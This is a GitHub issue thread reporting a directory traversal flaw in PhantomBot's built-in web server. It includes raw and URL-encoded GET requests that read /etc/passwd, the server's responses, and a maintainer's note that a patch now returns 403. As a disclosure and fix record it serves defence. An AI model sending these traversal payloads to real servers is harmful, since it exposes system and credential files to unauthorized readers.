### ISSUE TITLE
HTTP Directory Traversal

### ISSUE THREAD

**Issue by Lirum** [PhantomBot/PhantomBot#1497]
PhantomBot Version: 2.3.6.1
O/S Version: Debian 8.8
Java Version: 1.8.0_112-b15
Web Browser Version (if Panel related): telnet :-)

Detailed Description: 
You can access internal files on the local filesystem. For example the local passwd file on linux systems. This is a security issue.

Steps to Reproduce:

Use telnet to exclude the browsers behavior (telnet XXXXXXX 25005), then enter the request path with GET, press enter and you get the internal files.
On this setup the bot was running in the folder /home/phantombot/bot/.

The output of the passwd file is shorted.

The following traversal URL(s) where found:

Vulnerable url: http://XXXXXXX:25005/../../../../../../etc/passwd

Request:
`GET /../../../../../../etc/passwd HTTP/1.1 `
 

Response:
```
HTTP/1.1 200 OK 
Date: Wed, 07 Jun 2017 08:15:38 GMT 
Content-type: text/text 
Content-length: 2644 
 
root:x:0:0:root:/root:/bin/bash

```

Vulnerable url: http://XXXXXXX:25005/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd

Request:
`GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1 
`

Response:
```
HTTP/1.1 200 OK 
Date: Wed, 07 Jun 2017 08:15:38 GMT 
Content-type: text/text 
Content-length: 2644 
 
root:x:0:0:root:/root:/bin/bash
```

Vulnerable url: http://XXXXXXX:25005/..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Request:
`GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 `

Response:
```
HTTP/1.1 200 OK 
Date: Wed, 07 Jun 2017 08:15:38 GMT 
Content-type: text/text 
Content-length: 2644 
 
root:x:0:0:root:/root:/bin/bash
```

Logs:
No message (request was valid)

**Comment by IllusionaryOne** [comment]
Resolved in next build (Patch #1498)

GET /../../../../../etc/passwd HTTP/1.1

HTTP/1.1 403 Forbidden
Context-type: text/text
Date: Wed, 07 Jun 2017 17:47:37 GMT
Content-length: 11

Invalid URL
